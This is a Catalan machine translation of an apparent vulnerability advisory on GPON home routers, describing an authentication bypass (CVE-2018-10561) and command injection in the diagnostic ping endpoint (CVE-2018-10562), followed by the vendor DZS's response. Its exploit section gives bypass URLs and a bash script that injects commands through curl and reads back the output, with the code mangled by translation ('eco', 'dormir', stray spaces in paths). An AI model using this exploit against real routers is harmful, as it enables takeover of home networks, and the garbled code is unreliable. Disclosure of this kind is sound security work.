Vulnerabilitat crítica RCE que es troba en més d’un milió d’encaminadors domèstics GPON


Dues actualitzacions importants des que es va publicar aquest informe:

  1. El nostre equip de recerca ha creat un pegat que pot ajudar els usuaris afectats. Comproveu-ho aquí
  2. DASAN Zhone Solutions ens va enviar el seu comentari sobre l’informe. L’adjuntem “tal com està” al final d’aquesta pàgina

Visió general:

Hem fet una avaluació completa de diversos encaminadors domèstics GPON. Avui en dia, molts routers utilitzen Internet GPON i hem trobat una manera d’evitar tota l’autenticació als dispositius (CVE-2018-10561). Amb aquest bypass d’autenticació, també hem pogut revelar una altra vulnerabilitat d’injecció de comandaments (CVE-2018-10562) i executar ordres al dispositiu.

Explotació:

Durant la nostra anàlisi de firmwares GPON, hem detectat dues vulnerabilitats crítiques diferents (CVE-2018-10561 & CVE-2018-10562) que, en combinar-se, permet controlar completament el dispositiu i, per tant, la xarxa. La primera vulnerabilitat explota el mecanisme d’autenticació del dispositiu que presenta un defecte. Aquest defecte permet a qualsevol atacant obviar tota l’autenticació.

El defecte es pot trobar amb els servidors HTTP, que comproven si hi ha camins específics en autenticar-se. Això permet a l’atacant obviar l’autenticació en qualsevol punt final mitjançant un simple truc.

Si afegiu imatges / a l’URL, l’atacant pot obviar l’endpoint.

Això funciona tant a les pàgines HTML com a GponForm /

Per exemple, inserint

/menu.html?images/
o
/ GponForm / diag_FORM? Images /

podem gestionar el dispositiu.

Tot examinant les funcionalitats del dispositiu, vam observar que l’endpoint de diagnòstic contenia les ordres ping i traceroute. No ha trigat gaire en esbrinar que el paràmetre host pot injectar-se les ordres.

Com que l’encaminador guarda els resultats de ping en / tmp i el transmet a l’usuari quan l’usuari revisa /diag.html, és força simple executar ordres i recuperar la seva sortida amb la vulnerabilitat de bypass d’autenticació..

Inclouem la versió bàsica següent del codi exploit:
#! / bin / bash

eco “[+] S’està enviant el comandament …”
# Enviem les ordres amb dos modes backtick (`) i punt i coma (;) perquè diferents models es desencadenen en dispositius diferents
curl -k -d “XWebPageName = diag&diag_action = ping&wan_conlist = 0&dest_host = \ `$ 2 \`; 2 $&ipv = 0 ”$ 1 / GponForm / diag_Form? images / 2>/ dev / null 1>/ dev / null
eco “[+] Esperant …”
dormir 3
eco “[+] Com recuperar la sortida …”
curl -k $ 1 / diag.html? images / 2>/ dev / null | grep ‘diag_result =’ | sed -e “s / \\ n / \ n / g”

Impacte:

GPON és un tipus de xarxa òptica passiva que utilitza fibra òptica i és particularment popular. Quan les persones utilitzen GPON, els encaminadors els proporcionen els ISP. Al vídeo, podeu veure-ho més d’un milió de persones utilitzen aquest tipus d’encaminador del sistema de xarxa.

Hem provat aquesta vulnerabilitat en molts encaminadors GPON aleatoris i la vulnerabilitat es va trobar en totes elles. Perquè tanta gent utilitza aquest tipus d’encaminadors, aquesta vulnerabilitat pot donar lloc a un compromís de xarxa sencer.

Recomanacions:

  1. Comproveu si el vostre enrutador utilitza la xarxa GPON.
  2. Tingueu en compte que els encaminadors GPON es poden piratejar i explotar.
  3. Parleu amb el vostre ISP per veure què poden fer per solucionar l’error.
  4. Avisa als teus amics a Facebook (fes clic aquí per compartir) i Twitter (fes clic aquí per tuitejar).

Actualització: declaració de DZS sobre l’explotació de bypass d’autenticació

DASAN Zhone Solutions, Inc. ha investigat els recents informes sobre mitjans de comunicació que certs dispositius d’interfície de xarxa (NID) de DZS GPON, més coneguts com a encaminadors, podrien ser vulnerables a una explotació bypass d’autenticació..

DZS ha determinat que les sèries ZNID-GPON-25xx i certes H640series GPON ONT, quan operen en versions de programari específics, estan afectades per aquesta vulnerabilitat. Fins a la data, no s’ha informat de DZS en els impactes del servei d’aquesta vulnerabilitat. Després d’una investigació interna, hem determinat que l’impacte potencial té un abast molt més limitat que l’informat per vpnMentor. Segons els registres de vendes de DZS, combinats amb les dades de camp recollides fins a la data, hem estimat que el nombre de GPON ONT unitats que pot ser potencialment impactat per ser inferior a 240.000. A més, tenint en compte la maduresa relativa dels productes en el seu cicle de vida, pensem que l’impacte està limitat a encara menys dispositius.

Historial del producte

El DZS ZNID-GPON-25xx i alguns ONTs de la sèrie H640, inclòs el programari que va introduir aquesta vulnerabilitat, van ser desenvolupats per un proveïdor OEM i venut per DZS. Dissenyat i llançat fa més de 9 anys, la majoria d’aquests productes passen amb molt de temps durant la seva vida útil sostenible. Com que els contractes de suport de programari ja no s’ofereixen per a la majoria d’aquests productes, no tenim coneixement directe del nombre d’unitats que encara s’utilitzen activament en el camp.

Resolució

DZS ha informat a tots els clients que han comprat aquests models de la vulnerabilitat. Estem treballant amb cada client per ajudar-los a valorar els mètodes per resoldre el problema de les unitats que encara es poden instal·lar al camp. Correspon a la discreció de cada client decidir com abordar la condició del seu equip desplegat.

La missió de DZS és assegurar que totes les seves solucions compleixin els estàndards de seguretat més alts de la indústria. Comprovem aquesta oportunitat per revisar i millorar contínuament les metodologies de disseny i proves de seguretat.

Kim Martin Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map